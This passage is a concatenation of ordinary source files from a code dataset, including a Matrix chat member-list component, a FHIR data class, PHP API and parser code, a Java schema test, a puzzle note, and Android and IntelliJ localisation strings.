(cli.hasLazyLoadMembersEnabled()) {\n // show an empty list\n this.state = this._getMembersState([]);\n } else {\n this.state = this._getMembersState(this.roomMembers());\n }\n\n cli.on(\"Room\", this.onRoom); // invites & joining after peek\n const enablePresenceByHsUrl = SdkConfig.get()[\"enable_presence_by_hs_url\"];\n const hsUrl = MatrixClientPeg.get().baseUrl;\n this._showPresence = true;\n if (enablePresenceByHsUrl && enablePresenceByHsUrl[hsUrl] !== undefined) {\n this._showPresence = enablePresenceByHsUrl[hsUrl];\n }\n }\n\n // eslint-disable-next-line camelcase\n UNSAFE_componentWillMount() {\n const cli = MatrixClientPeg.get();\n this._mounted = true;\n if (cli.hasLazyLoadMembersEnabled()) {\n this._showMembersAccordingToMembershipWithLL();\n cli.on(\"Room.myMembership\", this.onMyMembership);\n } else {\n this._listenForMembersChanges();\n }\n }\n\n _listenForMembersChanges() {\n const cli = MatrixClientPeg.get();\n cli.on(\"RoomState.members\", this.onRoomStateMember);\n cli.on(\"RoomMember.name\", this.onRoomMemberName);\n cli.on(\"RoomState.events\", this.onRoomStateEvent);\n // We listen for changes to the lastPresenceTs which is essentially\n // listening for all presence events (we display most of not all of\n // the information contained in presence events).\n cli.on(\"User.lastPresenceTs\", this.onUserPresenceChange);\n cli.on(\"User.presence\", this.onUserPresenceChange);\n cli.on(\"User.currentlyActive\", this.onUserPresenceChange);\n // cli.on(\"Room.timeline\", this.onRoomTimeline);\n }\n\n componentWillUnmount() {\n this._mounted = false;\n const cli = MatrixClientPeg.get();\n if (cli) {\n cli.removeListener(\"RoomState.members\", this.onRoomStateMember);\n cli.removeListener(\"RoomMember.name\", this.onRoomMemberName);\n cli.removeListener(\"Room.myMembership\", this.onMyMembership);\n cli.removeListener(\"RoomState.events\", this.onRoomStateEvent);\n cli.removeListener(\"Room\", this.onRoom);\n cli.removeListener(\"User.lastPresenceTs\", this.onUserPresenceChange);\n cli.removeListener(\"User.presence\", this.onUserPresenceChange);\n cli.removeListener(\"User.currentlyActive\", this.onUserPresenceChange);\n }\n\n // cancel any pending calls to the rate_limited_funcs\n this._updateList.cancelPendingCall();\n }\n\n /**\n * If lazy loading is enabled, either:\n * show a spinner and load the members if the user is joined,\n * or show the members available so far if the user is invited\n */\n async _showMembersAccordingToMembershipWithLL() {\n const cli = MatrixClientPeg.get();\n if (cli.hasLazyLoadMembersEnabled()) {\n const cli = MatrixClientPeg.get();\n const room = cli.getRoom(this.props.roomId);\n const membership = room && room.getMyMembership();\n if (membership === \"join\") {\n this.setState({loading: true});\n try {\n await room.loadMembersIfNeeded();\n } catch (ex) {/* already logged in RoomView */}\n if (this._mounted) {\n this.setState(this._getMembersState(this.roomMembers()));\n this._listenForMembersChanges();\n }\n } else if (membership === \"invite\") {\n // show the members we've got when invited\n this.setState(this._getMembersState(this.roomMembers()));\n }\n }\n }\n\n _getMembersState(members) {\n // set the state after determining _showPresence to make sure it's\n // taken into account while rerendering\n return {\n loading: false,\n members: members,\n filteredJoinedMembers: this._filterMembers(members, 'join'),\n filteredInvitedMembers: this._filterMembers(members, 'invite'),\n\n // ideally we'd size this to the page height, but\n // in practice I find that a little constraining\n truncateAtJoined: INITIAL_LOAD_NUM_MEMBERS,\n truncateAtInvited: INITIAL_LOAD_NUM_INVITED,\n searchQuery: \"\",\n };\n }\n\n onUserPresenceChange = (event, user) => {\n // Attach a SINGLE listener for global presence changes then locate the\n // member tile and re-render it. This is more efficient than every tile\n // ever attaching their own listener.\n const tile = this.refs[user.userId];\n // console.log(`Got presence update for ${user.userId}. hasTile=${!!tile}`);\n if (tile) {\n this._updateList(); // reorder the membership list\n }\n };\n\n onRoom = room => {\n if (room.roomId !== this.props.roomId) {\n return;\n }\n // We listen for room events because when we accept an invite\n // we need to wait till the room is fully populated with state\n // before refreshing the member list else we get a stale list.\n this._showMembersAccordingToMembershipWithLL();\n };\n\n onMyMembership = (room, membership, oldMembership) => {\n if (room.roomId === this.props.roomId && membership === \"join\") {\n this._showMembersAccordingToMembershipWithLL();\n }\n };\n\n onRoomStateMember = (ev, state, member) => {\n if (member.roomId !== this.props.roomId) {\n return;\n }\n this._updateList();\n };\n\n onRoomMemberName = (ev, member) => {\n if (member.roomId !== this.props.roomId) {\n return;\n }\n this._updateList();\n };\n\n onRoomStateEvent = (event, state) => {\n if (event.getRoomId() === this.props.roomId &&\n event.getType() === \"m.room.third_party_invite\") {\n this._updateList();\n }\n };\n\n _updateList = rate_limited_func(() => {\n this._updateListNow();\n }, 500);\n\n _updateListNow() {\n // console.log(\"Updating memberlist\");\n const newState = {\n loading: false,\n members: this.roomMembers(),\n };\n newState.filteredJoinedMembers = this._filterMembers(newState.members, 'join', this.state.searchQuery);\n newState.filteredInvitedMembers = this._filterMembers(newState.members, 'invite', this.state.searchQuery);\n this.setState(newState);\n }\n\n getMembersWithUser() {\n if (!this.props.roomId) return [];\n const cli = MatrixClientPeg.get();\n const room = cli.getRoom(this.props.roomId);\n if (!room) return [];\n\n const allMembers = Object.values(room.currentState.members);\n\n allMembers.forEach(function(member) {\n // work around a race where you might have a room member object\n // before the user object exists. This may or may not cause\n // https://github.com/vector-im/vector-web/issues/186\n if (member.user === null) {\n member.user = cli.getUser(member.userId);\n }\n\n // XXX: this user may have no lastPresenceTs value!\n // the right solution here is to fix the race rather than leave it as 0\n });\n\n return allMembers;\n }\n\n roomMembers() {\n const allMembers = this.getMembersWithUser();\n const filteredAndSortedMembers = allMembers.filter((m) => {\n return (\n m.membership === 'join' || m.membership === 'invite'\n );\n });\n filteredAndSortedMembers.sort(this.memberSort);\n return filteredAndSortedMembers;\n }\n\n _createOverflowTileJoined = (overflowCount, totalCount) => {\n return this._createOverflowTile(overflowCount, totalCount, this._showMoreJoinedMemberList);\n };\n\n _createOverflowTileInvited = (overflowCount, totalCount) => {\n return this._createOverflowTile(overflowCount, totalCount, this._showMoreInvitedMemberList);\n };\n\n _createOverflowTile = (overflowCount, totalCount, onClick) => {\n // For now we'll pretend this is any entity. It should probably be a separate tile.\n const EntityTile = sdk.getComponent(\"rooms.EntityTile\");\n const BaseAvatar = sdk.getComponent(\"avatars.BaseAvatar\");\n const text = _t(\"and %(count)s others...\", { count: overflowCount });\n return (\n \n } name={text} presenceState=\"online\" suppressOnHover={true}\n onClick={onClick} />\n );\n };\n\n _showMoreJoinedMemberList = () => {\n this.setState({\n truncateAtJoined: this.state.truncateAtJoined + SHOW_MORE_INCREMENT,\n });\n };\n\n _showMoreInvitedMemberList = () => {\n this.setState({\n truncateAtInvited: this.state.truncateAtInvited + SHOW_MORE_INCREMENT,\n });\n };\n\n memberString(member) {\n if (!member) {\n return \"(null)\";\n } else {\n const u = member.user;\n return \"(\" + member.name + \", \" + member.powerLevel + \", \" + (u ? u.lastActiveAgo : \"\") + \", \" + (u ? u.getLastActiveTs() : \"\") + \", \" + (u ? u.currentlyActive : \"\") + \", \" + (u ? u.presence : \"\") + \")\";\n }\n }\n\n // returns negative if a comes before b,\n // returns 0 if a and b are equivalent in ordering\n // returns positive if a comes after b.\n memberSort = (memberA, memberB) => {\n // order by presence, with \"active now\" first.\n // ...and then by power level\n // ...and then by last active\n // ...and then alphabetically.\n // We could tiebreak instead by \"last recently spoken in this room\" if we wanted to.\n\n // console.log(`Comparing userA=${this.memberString(memberA)} userB=${this.memberString(memberB)}`);\n\n const userA = memberA.user;\n const userB = memberB.user;\n\n // if (!userA) console.log(\"!! MISSING USER FOR A-SIDE: \" + memberA.name + \" !!\");\n // if (!userB) console.log(\"!! MISSING USER FOR B-SIDE: \" + memberB.name + \" !!\");\n\n if (!userA && !userB) return 0;\n if (userA && !userB) return -1;\n if (!userA && userB) return 1;\n\n // First by presence\n if (this._showPresence) {\n const convertPresence = (p) => p === 'unavailable' ? 'online' : p;\n const presenceIndex = p => {\n const order = ['active', 'online', 'offline'];\n const idx = order.indexOf(convertPresence(p));\n return idx === -1 ? order.length : idx; // unknown states at the end\n };\n\n const idxA = presenceIndex(userA.currentlyActive ? 'active' : userA.presence);\n const idxB = presenceIndex(userB.currentlyActive ? 'active' : userB.presence);\n // console.log(`userA_presenceGroup=${idxA} userB_presenceGroup=${idxB}`);\n if (idxA !== idxB) {\n // console.log(\"Comparing on presence group - returning\");\n return idxA - idxB;\n }\n }\n\n // Second by power level\n if (memberA.powerLevel !== memberB.powerLevel) {\n // console.log(\"Comparing on power level - returning\");\n return memberB.powerLevel - memberA.powerLevel;\n }\n\n // Third by last active\n if (this._showPresence && userA.getLastActiveTs() !== userB.getLastActiveTs()) {\n // console.log(\"Comparing on last active timestamp - returning\");\n return userB.getLastActiveTs() - userA.getLastActiveTs();\n }\n\n // Fourth by name (alphabetical)\n const nameA = (memberA.name[0] === '@' ? memberA.name.substr(1) : memberA.name).replace(SORT_REGEX, \"\");\n const nameB = (memberB.name[0] === '@' ? memberB.name.substr(1) : memberB.name).replace(SORT_REGEX, \"\");\n // console.log(`Comparing userA_name=${nameA} against userB_name=${nameB} - returning`);\n return nameA.localeCompare(nameB, {\n ignorePunctuation: true,\n sensitivity: \"base\",\n });\n };\n\n onSearchQueryChanged = searchQuery => {\n this.setState({\n searchQuery,\n filteredJoinedMembers: this._filterMembers(this.state.members, 'join', searchQuery),\n filteredInvitedMembers: this._filterMembers(this.state.members, 'invite', searchQuery),\n });\n };\n\n _onPending3pidInviteClick = inviteEvent => {\n dis.dispatch({\n action: 'view_3pid_invite',\n event: inviteEvent,\n });\n };\n\n _filterMembers(members, membership, query) {\n return members.filter((m) => {\n if (query) {\n query = query.toLowerCase();\n const matchesName = m.name.toLowerCase().indexOf(query) !== -1;\n const matchesId = m.userId.toLowerCase().indexOf(query) !== -1;\n\n if (!matchesName && !matchesId) {\n return false;\n }\n }\n\n return m.membership === membership;\n });\n }\n\n _getPending3PidInvites() {\n // include 3pid invites (m.room.third_party_invite) state events.\n // The HS may have already converted these into m.room.member invites so\n // we shouldn't add them if the 3pid invite state key (token) is in the\n // member invite (content.third_party_invite.signed.token)\n const room = MatrixClientPeg.get().getRoom(this.props.roomId);\n\n if (room) {\n return room.currentState.getStateEvents(\"m.room.third_party_invite\").filter(function(e) {\n if (!isValid3pidInvite(e)) return false;\n\n // discard all invites which have a m.room.member event since we've\n // already added them.\n const memberEvent = room.currentState.getInviteForThreePidToken(e.getStateKey());\n if (memberEvent) return false;\n return true;\n });\n }\n }\n\n _makeMemberTiles(members) {\n const MemberTile = sdk.getComponent(\"rooms.MemberTile\");\n const EntityTile = sdk.getComponent(\"rooms.EntityTile\");\n\n return members.map((m) => {\n if (m.userId) {\n // Is a Matrix invite\n return ;\n } else {\n // Is a 3pid invite\n return this._onPending3pidInviteClick(m)} />;\n }\n });\n }\n\n _getChildrenJoined = (start, end) => this._makeMemberTiles(this.state.filteredJoinedMembers.slice(start, end));\n\n _getChildCountJoined = () => this.state.filteredJoinedMembers.length;\n\n _getChildrenInvited = (start, end) => {\n let targets = this.state.filteredInvitedMembers;\n if (end > this.state.filteredInvitedMembers.length) {\n targets = targets.concat(this._getPending3PidInvites());\n }\n\n return this._makeMemberTiles(targets.slice(start, end));\n };\n\n _getChildCountInvited = () => {\n return this.state.filteredInvitedMembers.length + (this._getPending3PidInvites() || []).length;\n }\n\n render() {\n if (this.state.loading) {\n const Spinner = sdk.getComponent(\"elements.Spinner\");\n return \n \n ;\n }\n\n const SearchBox = sdk.getComponent('structures.SearchBox');\n const TruncatedList = sdk.getComponent(\"elements.TruncatedList\");\n\n const cli = MatrixClientPeg.get();\n const room = cli.getRoom(this.props.roomId);\n let inviteButton;\n\n if (room && room.getMyMembership() === 'join') {\n // assume we can invite until proven false\n let canInvite = true;\n\n const plEvent = room.currentState.getStateEvents(\"m.room.power_levels\", \"\");\n const me = room.getMember(cli.getUserId());\n if (plEvent && me) {\n const content = plEvent.getContent();\n if (content && content.invite > me.powerLevel) {\n canInvite = false;\n }\n }\n\n let inviteButtonText = _t(\"Invite to this room\");\n const chat = CommunityPrototypeStore.instance.getSelectedCommunityGeneralChat();\n if (chat && chat.roomId === this.props.roomId) {\n inviteButtonText = _t(\"Invite to this community\");\n }\n\n const AccessibleButton = sdk.getComponent(\"elements.AccessibleButton\");\n inviteButton =\n \n { inviteButtonText }\n ;\n }\n\n let invitedHeader;\n let invitedSection;\n if (this._getChildCountInvited() > 0) {\n invitedHeader =

{ _t(\"Invited\") }

;\n invitedSection = ;\n }\n\n const footer = (\n \n );\n\n return \n
\n \n { invitedHeader }\n { invitedSection }\n
\n ;\n }\n\n onInviteButtonClick = () => {\n if (MatrixClientPeg.get().isGuest()) {\n dis.dispatch({action: 'require_registration'});\n return;\n }\n\n // call AddressPickerDialog\n dis.dispatch({\n action: 'view_invite',\n roomId: this.props.roomId,\n });\n };\n}\n"} {"text": "/**\n * @name exports\n * @summary AuditEventObjectDetail Class\n */\nmodule.exports = class AuditEventObjectDetail {\n constructor(opts) {\n // Create an object to store all props\n Object.defineProperty(this, '__data', { value: {} });\n\n // Define getters and setters as enumerable\n\n Object.defineProperty(this, '_id', {\n enumerable: true,\n get: () => this.__data._id,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Element = require('./element.js');\n this.__data._id = new Element(value);\n },\n });\n\n Object.defineProperty(this, 'id', {\n enumerable: true,\n get: () => this.__data.id,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n this.__data.id = value;\n },\n });\n\n Object.defineProperty(this, 'extension', {\n enumerable: true,\n get: () => this.__data.extension,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Extension = require('./extension.js');\n this.__data.extension = Array.isArray(value)\n ? value.map((v) => new Extension(v))\n : [new Extension(value)];\n },\n });\n\n Object.defineProperty(this, 'modifierExtension', {\n enumerable: true,\n get: () => this.__data.modifierExtension,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Extension = require('./extension.js');\n this.__data.modifierExtension = Array.isArray(value)\n ? value.map((v) => new Extension(v))\n : [new Extension(value)];\n },\n });\n\n Object.defineProperty(this, '_type', {\n enumerable: true,\n get: () => this.__data._type,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Element = require('./element.js');\n this.__data._type = new Element(value);\n },\n });\n\n Object.defineProperty(this, 'type', {\n enumerable: true,\n get: () => this.__data.type,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n this.__data.type = value;\n },\n });\n\n Object.defineProperty(this, '_value', {\n enumerable: true,\n get: () => this.__data._value,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Element = require('./element.js');\n this.__data._value = new Element(value);\n },\n });\n\n Object.defineProperty(this, 'value', {\n enumerable: true,\n get: () => this.__data.value,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n this.__data.value = value;\n },\n });\n\n // Merge in any defaults\n Object.assign(this, opts);\n\n // Define a default non-writable resourceType property\n Object.defineProperty(this, 'resourceType', {\n value: 'AuditEventObjectDetail',\n enumerable: true,\n writable: false,\n });\n }\n\n static get resourceType() {\n return 'AuditEventObjectDetail';\n }\n\n toJSON() {\n return {\n id: this.id,\n extension: this.extension && this.extension.map((v) => v.toJSON()),\n modifierExtension: this.modifierExtension && this.modifierExtension.map((v) => v.toJSON()),\n _type: this._type && this._type.toJSON(),\n type: this.type,\n _value: this._value && this._value.toJSON(),\n value: this.value,\n };\n }\n};\n"} {"text": "getCourseService()->tryTakeCourse($courseId);\n } catch (\\Exception $e) {\n return $this->error(404, \"用户尚未登录或不是课程学员\");\n }\n\n $start = $request->query->get('start', 0);\n $limit = $request->query->get('limit', 10);\n\n $statuses = $this->getStatusService()->searchStatuses(\n array('userId' => $member['userId'], 'courseId' => $courseId),\n array('createdTime' => 'DESC'),\n $start,\n $limit\n );\n\n return $this->_filterStatus($statuses);\n }\n\n public function filter($res)\n {\n $res = ArrayToolkit::parts($res, array('id', 'userId', 'courseId', 'classroomId', 'type', 'objectType', 'objectId', 'properties', 'createdTime'));\n\n return $res;\n }\n\n private function _filterStatus(&$res)\n {\n foreach ($res as $key => &$item) {\n unset($item['private']);\n unset($item['commentNum']);\n unset($item['likeNum']);\n }\n\n return $res;\n }\n\n protected function getStatusService()\n {\n return ServiceKernel::instance()->createService('User:StatusService');\n }\n\n protected function getUserService()\n {\n return ServiceKernel::instance()->createService('User:UserService');\n }\n\n protected function getCourseService()\n {\n return $this->getServiceKernel()->createService('Course:CourseService');\n }\n}\n"} {"text": "\n\n\n\n \"Corte largo\"\n\n"} {"text": "/*\n * Copyright © 2019 Cask Data, Inc.\n * \n * Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n * use this file except in compliance with the License. You may obtain a copy of\n * the License at\n * \n * http://www.apache.org/licenses/LICENSE-2.0\n * \n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n * License for the specific language governing permissions and limitations under\n * the License.\n */\n\npackage io.cdap.cdap.metadata.elastic;\n\nimport io.cdap.cdap.api.data.schema.Schema;\nimport io.cdap.cdap.api.metadata.MetadataEntity;\nimport org.junit.Assert;\nimport org.junit.Test;\n\npublic class MetadataDocumentTest {\n\n @Test\n public void testSchema() {\n Schema bytesArraySchema = Schema.arrayOf(Schema.of(Schema.Type.BYTES));\n Schema stringArraySchema = Schema.arrayOf(Schema.of(Schema.Type.STRING));\n Schema booleanBytesMapSchema = Schema.mapOf(Schema.of(Schema.Type.BOOLEAN), Schema.of(Schema.Type.BYTES));\n Schema nestedMapSchema = Schema.mapOf(bytesArraySchema, booleanBytesMapSchema);\n Schema record22Schema = Schema.recordOf(\"record22\", Schema.Field.of(\"a\", nestedMapSchema));\n Schema record22ArraySchema = Schema.arrayOf(record22Schema);\n Schema bytesDoubleMapSchema = Schema.mapOf(Schema.of(Schema.Type.BYTES), Schema.of(Schema.Type.DOUBLE));\n Schema record21Schema = Schema.recordOf(\"record21\",\n Schema.Field.of(\"x\", Schema.of(Schema.Type.STRING)),\n Schema.Field.of(\"y\", stringArraySchema),\n Schema.Field.of(\"z\", bytesDoubleMapSchema));\n Schema record21to22MapSchema = Schema.mapOf(record21Schema, record22ArraySchema);\n Schema nullableIntSchema = Schema.nullableOf(Schema.of(Schema.Type.INT));\n Schema tripeUnionSchema = Schema.unionOf(Schema.of(Schema.Type.INT), Schema.of(Schema.Type.LONG),\n Schema.of(Schema.Type.NULL));\n Schema complexSchema = Schema.recordOf(\"record1\",\n Schema.Field.of(\"map1\", record21to22MapSchema),\n Schema.Field.of(\"i\", nullableIntSchema),\n Schema.Field.of(\"j\", tripeUnionSchema));\n Schema anotherComplexSchema = Schema.arrayOf(Schema.of(Schema.Type.STRING));\n Schema superComplexSchema = Schema.unionOf(complexSchema, anotherComplexSchema, Schema.of(Schema.Type.NULL));\n\n String[] results = MetadataDocument.Builder.parseSchema(MetadataEntity.ofDataset(\"ds\"),\n superComplexSchema.toString()).split(\" \");\n String[] expected = {\n \"record1\", \"record1:RECORD\",\n \"map1\", \"map1:MAP\",\n \"record21\", \"record21:RECORD\",\n \"x\", \"x:STRING\",\n \"y\", \"y:ARRAY\",\n \"z\", \"z:MAP\",\n \"record22\", \"record22:RECORD\",\n \"a\", \"a:MAP\",\n \"i\", \"i:INT\",\n \"j\", \"j:UNION\",\n };\n Assert.assertArrayEquals(expected, results);\n }\n\n @Test\n public void testInvalidSchema() {\n Schema schema = Schema.recordOf(\"mystruct\",\n Schema.Field.of(\"x\", Schema.of(Schema.Type.STRING)),\n Schema.Field.of(\"y\", Schema.of(Schema.Type.INT)),\n Schema.Field.of(\"z\", Schema.of(Schema.Type.DOUBLE)));\n String schemaString = schema.toString();\n MetadataEntity entity = MetadataEntity.ofDataset(\"ds\");\n String[] results = MetadataDocument.Builder.parseSchema(entity, schemaString).split(\" \");\n String[] expected = {\"mystruct\", \"mystruct:RECORD\", \"x\", \"x:STRING\", \"y\", \"y:INT\", \"z\", \"z:DOUBLE\"};\n Assert.assertArrayEquals(expected, results);\n\n String schemaWithInvalidTypes = schemaString.replace(\"string\", \"nosuchtype\");\n Assert.assertEquals(schemaWithInvalidTypes, MetadataDocument.Builder.parseSchema(entity, schemaWithInvalidTypes));\n\n String truncatedSchema = schemaString.substring(10, schemaString.length() - 10);\n Assert.assertEquals(truncatedSchema, MetadataDocument.Builder.parseSchema(entity, truncatedSchema));\n }\n}\n"} {"text": "This is a brain teaser kind of problem.\n\nObservation #1, whether #N light stays on depends on how many unique factors N have. Prime numbers must be off, because it is switched on Round 1 and off in Round N.\n\nObservation #2, for a light #N to stays on, N needs to have odd number of factors. Fact: only square numbers can have odd number of unique factors.\n\nProof by contradiction: If a number has odd number of unique factors, and is not a square number, write down all its unique factors, and start crossing off the factors: If I*J=N, cross off J as well as I. In the end, there is only one factor M left, M*M has to be N.\n\n"} {"text": "name = \\is_string($name) ? new Identifier($name) : $name;\n $this->value = $value;\n }\n\n public function getSubNodeNames() : array {\n return ['name', 'value'];\n }\n \n public function getType() : string {\n return 'Const';\n }\n}\n"} {"text": "\n\n\n Görünüm\n Tema, Gösterilecek öğe, vb\n Frekans, filtreler, zilsesi, vb\n Haber akışı\n Haberleşme kısmında hangi öğelerin görüneceğini belirle\n Davranış\n Uygulamanın belirli ayarlarla nasıl etkilesime girdiğini tanımlayın\n \n Ölcülen ağları etkiliyen secenekleri tanımlayın\n Deneysel\n Potansiyel olarak kararsız özelliklere erken erişim sağlamayı etkin kıl\n Frost Hakkında Facebook için\n Versiyon, Crediler, ve SSS\n Çeviri Yardımı\n Frost kalabalıklar içindedir. İsterseniz kendi dilinizde katkı sağlayın!\n Frost Hata ayıklayıcı\n Yardımcı olmak için hataları gönderebilirsiniz.\n Kural tekrarı\n\n"} {"text": "/* This Source Code Form is subject to the terms of the Mozilla Public\n * License, v. 2.0. If a copy of the MPL was not distributed with this\n * file, You can obtain one at https://mozilla.org/MPL/2.0/. */\n\nexport class UIHandler {\n init() {\n browser.commands.onCommand.addListener(this.onKeyCommand.bind(this));\n browser.convContacts.onColumnHandler.addListener(\n () => {},\n browser.i18n.getMessage(\"between.columnName\"),\n browser.i18n.getMessage(\"between.columnTooltip\"),\n browser.i18n.getMessage(\"message.meBetweenMeAndSomeone\"),\n browser.i18n.getMessage(\"message.meBetweenSomeoneAndMe\"),\n browser.i18n.getMessage(\"header.commaSeparator\"),\n browser.i18n.getMessage(\"header.andSeparator\")\n );\n }\n\n onKeyCommand(command) {\n if (command == \"quick_compose\") {\n console.warn(\"Quick Compose is currently disabled\");\n // The title/description for this pref is really confusing, we should\n // reconsider it when we re-enable.\n // if (Prefs.compose_in_tab) {\n // window.openTab(\"chromeTab\", {\n // chromePage:\n // \"chrome://conversations/content/stub.xhtml?quickCompose=1\",\n // });\n // } else {\n // window.open(\n // \"chrome://conversations/content/stub.xhtml?quickCompose=1\",\n // \"\",\n // \"chrome,width=1020,height=600\"\n // );\n // }\n }\n }\n}\n"} {"text": "codeinsight.settings=CodeInsight settings\nerror.hint.file.is.readonly=File {0} is read-only\nerror.dialog.readonly.file.title=File Is Read-Only\nerror.dialog.readonly.files.title=Cannot Modify Read-Only Files\nerror.dialog.readonly.files.message={0} contains read-only file(s).\\nProcess all other (writeable) files?\nprocess.scope.directory=Directory ''{0}''\nprocess.scope.project=Project ''{0}''\nprocess.scope.module=Module ''{0}''\nreformat.code.accept.button.text=Run\nprocess.scope.changed.files=process only VCS changed files\nprocess.scope.file=&File {0}\nreformat.option.selected.text=&Selected text\nreformat.option.all.files.in.directory=&All files in directory {0}\nreformat.option.include.subdirectories=&Include subdirectories\nreformat.option.optimize.imports=&Optimize imports\nreformat.option.rearrange.entries=&Rearrange entries\nreformat.option.vcs.changed.region=Only &VCS changed text\nreformat.progress.file.with.known.name.text=Reformatting {0}\nreformat.and.optimize.progress.common.text=Preparing imports...\nreformat.progress.common.text=Reformatting code...\nprocess.optimize.imports=Optimize Imports\nprocess.optimize.imports.before.commit=Optimize Imports Before Commit\nprogress.text.optimizing.imports=Optimizing imports...\nprogress.reformat.and.optimize.common.command.text=Reformat and Optimize Imports\nprogress.reformat.stage.wrapping.blocks=Preparing...\nprogress.reformat.stage.processing.blocks=Calculating changes...\nprogress.reformat.stage.applying.changes=Storing changes...\nprocess.reformat.code=Reformat Code\nprocess.reformat.code.before.commit=Reformat Code Before Commit\ndialog.reformat.files.title=Reformat Files\ndialog.reformat.files.optimize.imports.checkbox=&Optimize imports\ndialog.reformat.files.reformat.selected.files.label=Reformat selected files?\ncommand.name.typing=Typing\ndialog.import.on.paste.title=Select Classes to Import\ndialog.import.on.paste.title2=Select Elements to Import\ndialog.paste.on.import.text=The code fragment which you have pasted uses classes that are not accessible by imports in the new context.
Select classes that you want to import to the new file.\ndialog.paste.on.import.text2=The code fragment which you have pasted uses elements that are not accessible by imports in the new context.
Select elements that you want to import to the new file.\npaste.data.flavor.folding=FoldingData\npaste.dataflavor.referencedata=ReferenceData\ngenerate.constructor.fields.chooser.title=Choose Fields to Initialize by Constructor\nerror.attempt.to.generate.constructor.for.anonymous.class=Cannot add constructor to an anonymous class\ngenerate.constructor.super.constructor.chooser.title=Choose Super Class Constructor\ngenerate.delegate.method.chooser.title=Select Methods to Generate Delegates for\ngenerate.delegate.target.chooser.title=Select Target to Generate Delegates for\ngenerate.equals.and.hashcode.already.defined.warning=Methods ''boolean equals(Object)'' and ''int hashCode()'' are already defined\\nfor class {0}. Do you want to delete them and proceed?\ngenerate.equals.and.hashcode.already.defined.warning.anonymous=Methods 'boolean equals(Object)' and 'int hashCode()' are already defined\\nfor this anonymous class. Do you want to delete them and proceed?\ngenerate.equals.and.hashcode.already.defined.title=Generate equals() and hashCode()\ngenerate.equals.and.hashcode.error.no.object.class.message=Cannot generate equals() and hashCode().\\nNo java.lang.Object class found.\ngenerate.equals.and.hashcode.error.no.object.class.title=No java.lang.Object\ngenerate.equals.compare.nested.arrays.comment= // Compare nested arrays - values of {0} here\ngenerate.equals.compare.arrays.comment= // Probably incorrect - comparing Object[] arrays with Arrays.equals\ngenerate.getter.setter.title=Select Fields to Generate Getters and Setters\ngenerate.getter.fields.chooser.title=Select Fields to Generate Getters\ngenerate.setter.fields.chooser.title=Select Fields to Generate Setters\noverride.implement.broken.file.template.message=Please Correct \"Overridden/Implemented Method Body\" Template\noverride.implement.broken.file.template.title=File Template Error\nmethods.to.implement.chooser.title=Select Methods to Implement\nmethods.to.override.chooser.title=Select Methods to Override\nmethods.to.override.implement.chooser.title=Select Methods to Override/Implement\ngenerate.list.popup.title=Generate\nsurround.with.cast.template=((Type)expr)\nsurround.with.dowhile.template=do / while\nsurround.with.for.template=for\nsurround.with.ifelse.expression.template=if (expr) {...} else {...}\nsurround.with.ifelse.template=if / else\nsurround.with.if.expression.template=if (expr) {...}\nsurround.with.if.template=if\nsurround.with.not.instanceof.template=!(expr instanceof Type)\nsurround.with.not.template=!(expr)\nsurround.with.parenthesis.template=(expr)\nsurround.with.runnable.template=Runnable\nsurround.with.synchronized.template=synchronized\nsurround.with.try.catch.finally.template=try / catch / finally\nsurround.with.try.catch.template=try / catch\nsurround.with.try.catch.incorrect.template.message=Invalid File Template for Catch Body!\nsurround.with.try.catch.incorrect.template.title=Surround With Try / Catch\nsurround.with.try.finally.template=try / finally\nsurround.with.while.template=while\nsurround.with.runtime.type.template=((RuntimeType)expr)\nsurround.with.chooser.title=Surround With\nunwrap.popup.title=Choose the statement to unwrap/remove\nunwrap.if=Unwrap 'if...'\nunwrap.else=Unwrap 'else...'\nremove.else=Remove 'else...'\nunwrap.while=Unwrap 'while...'\nunwrap.for=Unwrap 'for...'\nunwrap.braces=Unwrap braces\nunwrap.try=Unwrap 'try...'\nunwrap.conditional=Unwrap 'f ? a : b'\nremove.catch=Remove 'catch...'\nunwrap.synchronized=Unwrap 'synchronized...'\nunwrap.with.placeholder=Unwrap ''{0}''\nunwrap.anonymous=Unwrap 'anonymous...'\ngenerate.equals.hashcode.wizard.title=Generate equals() and hashCode()\ngenerate.equals.hashcode.equals.fields.chooser.title=Choose &fields to be included in equals()\ngenerate.equals.hashcode.hashcode.fields.chooser.title=Choose &fields to be included in hashCode()\ngenerate.equals.hashcode.non.null.fields.chooser.title=Select all non-null &fields\ngenerate.equals.hashcode.accept.sublcasses=Accept &subclasses as parameter to equals() method\ngenerate.equals.hashcode.accept.sublcasses.explanation=While generally incompliant to Object.equals() specification accepting
subclasses might be necessary for generated \\\nmethod to work correctly
with frameworks, which generate Proxy subclasses like Hibernate.\ngenerate.equals.hashcode.internal.error=Internal error\ngenerate.equals.warning.equals.for.nested.arrays.not.supported=equals() for nested arrays is not supported\ngenerate.equals.warning.generated.equals.could.be.incorrect=Generated equals() for Object[] can be incorrect\ngenerate.equals.hashcode.warning.hashcode.for.arrays.is.not.supported=hashCode () for arrays is not supported\nhighlight.thrown.exceptions.chooser.all.entry=All listed\nhighlight.exceptions.thrown.chooser.title=Choose Exception Classes to Highlight\nhighlight.exceptions.thrown.notfound=No exceptions thrown in the method found \nstatus.bar.exit.points.highlighted.message={0} exit {0, choice, 1#point|2#points} highlighted (press {1} again to remove the highlighting, Escape to remove all highlighting)\nstatus.bar.highlighted.usages.message={0} {0, choice, 1#usage|2#usages} of {1} found (press {2} again to remove the highlighting, Escape to remove all highlighting)\nstatus.bar.highlighted.usages.no.target.message={0} {0, choice, 1#usage|2#usages} found (press {2} again to remove the highlighting, Escape to remove all highlighting)\nstatus.bar.overridden.methods.highlighted.message={0} overridden {0, choice, 1#method|2#methods} found (press {1} again to remove the highlighting, Escape to remove all highlighting)\nstatus.bar.highlighted.usages.not.found.message=No usages of {0} found\nstatus.bar.highlighted.usages.not.found.no.target.message=No usages 